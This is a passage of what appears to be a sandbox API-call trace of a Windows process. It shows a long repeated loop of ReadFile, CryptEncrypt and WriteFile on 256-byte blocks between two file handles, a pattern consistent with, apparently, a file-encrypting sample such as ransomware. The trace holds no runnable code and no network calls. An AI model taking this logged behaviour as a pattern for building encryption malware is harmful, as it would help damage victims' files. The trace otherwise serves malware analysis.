pdwDataLen=0x2d7e148*=0x100) returned 1 [0169.090] GetLastError () returned 0x0 [0169.090] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0169.090] ReadFile (in: hFile=0x15b0, lpBuffer=0x2893368, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x2893368*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0169.090] CryptEncrypt (in: hKey=0x9ad278, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0169.090] GetLastError () returned 0x0 [0169.090] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0169.090] ReadFile (in: hFile=0x15b0, lpBuffer=0x2893368, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x2893368*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0169.090] CryptEncrypt (in: hKey=0x9ad278, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0169.091] GetLastError () returned 0x0 [0169.091] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0169.091] ReadFile (in: hFile=0x15b0, lpBuffer=0x2893368, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x2893368*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0169.091] CryptEncrypt (in: hKey=0x9ad278, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0169.091] GetLastError () returned 0x0 [0169.091] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0169.091] ReadFile (in: hFile=0x15b0, lpBuffer=0x2893368, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x2893368*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0169.091] CryptEncrypt (in: hKey=0x9ad278, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0169.091] GetLastError () returned 0x0 [0169.091] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0169.091] ReadFile (in: hFile=0x15b0, lpBuffer=0x2893368, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x2893368*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0169.091] CryptEncrypt (in: hKey=0x9ad278, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0169.091] GetLastError () returned 0x0 [0169.091] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0169.091] ReadFile (in: hFile=0x15b0, lpBuffer=0x2893368, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x2893368*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0169.091] CryptEncrypt (in: hKey=0x9ad278, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0169.091] GetLastError () returned 0x0 [0169.091] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0169.091] ReadFile (in: hFile=0x15b0, lpBuffer=0x2893368, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x2893368*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0169.091] CryptEncrypt (in: hKey=0x9ad278, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0169.091] GetLastError () returned 0x0 [0169.091] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0169.091] ReadFile (in: hFile=0x15b0, lpBuffer=0x2893368, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x2893368*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0169.091] CryptEncrypt (in: hKey=0x9ad278, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0169.091] GetLastError () returned 0x0 [0169.092] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0169.092] ReadFile (in: hFile=0x15b0, lpBuffer=0x2893368, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x2893368*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0169.092] CryptEncrypt (in: hKey=0x9ad278, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0169.092] GetLastError () returned 0x0 [0169.092] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0169.092] ReadFile (in: hFile=0x15b0, lpBuffer=0x2893368, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x2893368*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0169.092] CryptEncrypt (in: hKey=0x9ad278, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0169.092] GetLastError () returned 0x0 [0169.092] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0169.092] ReadFile (in: hFile=0x15b0, lpBuffer=0x2893368, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x2893368*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0169.092] CryptEncrypt (in: hKey=0x9ad278, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0169.092] GetLastError () returned 0x0 [0169.092] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0169.092] ReadFile (in: hFile=0x15b0, lpBuffer=0x2893368, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x2893368*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0169.092] CryptEncrypt (in: hKey=0x9ad278, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0169.092] GetLastError () returned 0x0 [0169.092] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0169.092] ReadFile (in: hFile=0x15b0, lpBuffer=0x2893368, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x2893368*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0169.092] CryptEncrypt (in: hKey=0x9ad278, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0169.093] GetLastError () returned 0x0 [0169.093] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0169.093] ReadFile (in: hFile=0x15b0, lpBuffer=0x2893368, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x2893368*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0169.093] CryptEncrypt (in: hKey=0x9ad278, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0169.093] GetLastError () returned 0x0 [0169.093] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0169.093] ReadFile (in: hFile=0x15b0, lpBuffer=0x2893368, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x2893368*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0169.093] CryptEncrypt (in: hKey=0x9ad278, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0169.093] GetLastError () returned 0x0 [0169.093] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0169.093] ReadFile (in: hFile=0x15b0, lpBuffer=0x2893368, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x2893368*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0169.093] CryptEncrypt (in: hKey=0x9ad278, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0169.093] GetLastError () returned 0x0 [0169.093] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0169.093] ReadFile (in: hFile=0x15b0, lpBuffer=0x2893368, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x2893368*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0169.093] CryptEncrypt (in: hKey=0x9ad278, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0169.093] GetLastError () returned 0x0 [0169.093] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0169.093] ReadFile (in: hFile=0x15b0, lpBuffer=0x2893368, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x2893368*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0169.093] CryptEncrypt (in: hKey=0x9ad278, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0169.093] GetLastError () returned 0x0 [0169.093] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0169.093] ReadFile (in: hFile=0x15b0, lpBuffer=0x2893368, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x2893368*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0169.094] CryptEncrypt (in: hKey=0x9ad278, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0169.094] GetLastError () returned 0x0 [0169.094] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0169.094] ReadFile (in: hFile=0x15b0, lpBuffer=0x2893368, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x2893368*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0169.094] CryptEncrypt (in: hKey=0x9ad278, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0169.094] GetLastError () returned 0x0 [0169.094] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0169.094] ReadFile (in: hFile=0x15b0, lpBuffer=0x2893368, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x2893368*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0169.094] CryptEncrypt (in: hKey=0x9ad278, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0169.094] GetLastError () returned 0x0 [0169.094] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0169.094] ReadFile (in: hFile=0x15b0, lpBuffer=0x2893368, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x2893368*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0169.094] CryptEncrypt (in: hKey=0x9ad278, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0169.094] GetLastError () returned 0x0 [0169.094] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0169.094] ReadFile (in: hFile=0x15b0, lpBuffer=0x2893368, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x2893368*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0169.094] CryptEncrypt (in: hKey=0x9ad278, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0169.094] GetLastError () returned 0x0 [0169.094] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0169.094] ReadFile (in: hFile=0x15b0, lpBuffer=0x2893368, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x2893368*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0169.094] CryptEncrypt (in: hKey=0x9ad278, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0169.094] GetLastError () returned 0x0 [0169.094] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0169.094] ReadFile (in: hFile=0x15b0, lpBuffer=0x2893368, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x2893368*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0169.094] CryptEncrypt (in: hKey=0x9ad278, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0169.094] GetLastError () returned 0x0 [0169.094] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0169.095] ReadFile (in: hFile=0x15b0, lpBuffer=0x2893368, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x2893368*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0169.095] CryptEncrypt (in: hKey=0x9ad278, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0169.095] GetLastError () returned 0x0 [0169.095] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0169.095] ReadFile (in: hFile=0x15b0, lpBuffer=0x2893368, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x2893368*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0169.095] CryptEncrypt (in: hKey=0x9ad278, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0169.095] GetLastError () returned 0x0 [0169.095] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0169.095] ReadFile (in: hFile=0x15b0, lpBuffer=0x2893368, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x2893368*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0169.095] CryptEncrypt (in: hKey=0x9ad278, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0169.095] GetLastError () returned 0x0 [0169.095] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0169.095] ReadFile (in: hFile=0x15b0, lpBuffer=0x2893368, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x2893368*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0169.095] CryptEncrypt (in: hKey=0x9ad278, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0169.095] GetLastError () returned 0x0 [0169.095] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0169.095] ReadFile (in: hFile=0x15b0, lpBuffer=0x2893368, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x2893368*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0169.095] CryptEncrypt (in: hKey=0x9ad278, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0169.095] GetLastError () returned 0x0 [0169.095] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0169.095] ReadFile (in: hFile=0x15b0, lpBuffer=0x2893368, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x2893368*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0169.095] CryptEncrypt (in: hKey=0x9ad278, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0169.095] GetLastError () returned 0x0 [0169.096] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0169.096] ReadFile (in: hFile=0x15b0, lpBuffer=0x2893368, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x2893368*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0169.096] CryptEncrypt (in: hKey=0x9ad278, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0169.096] GetLastError () returned 0x0 [0169.096] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, 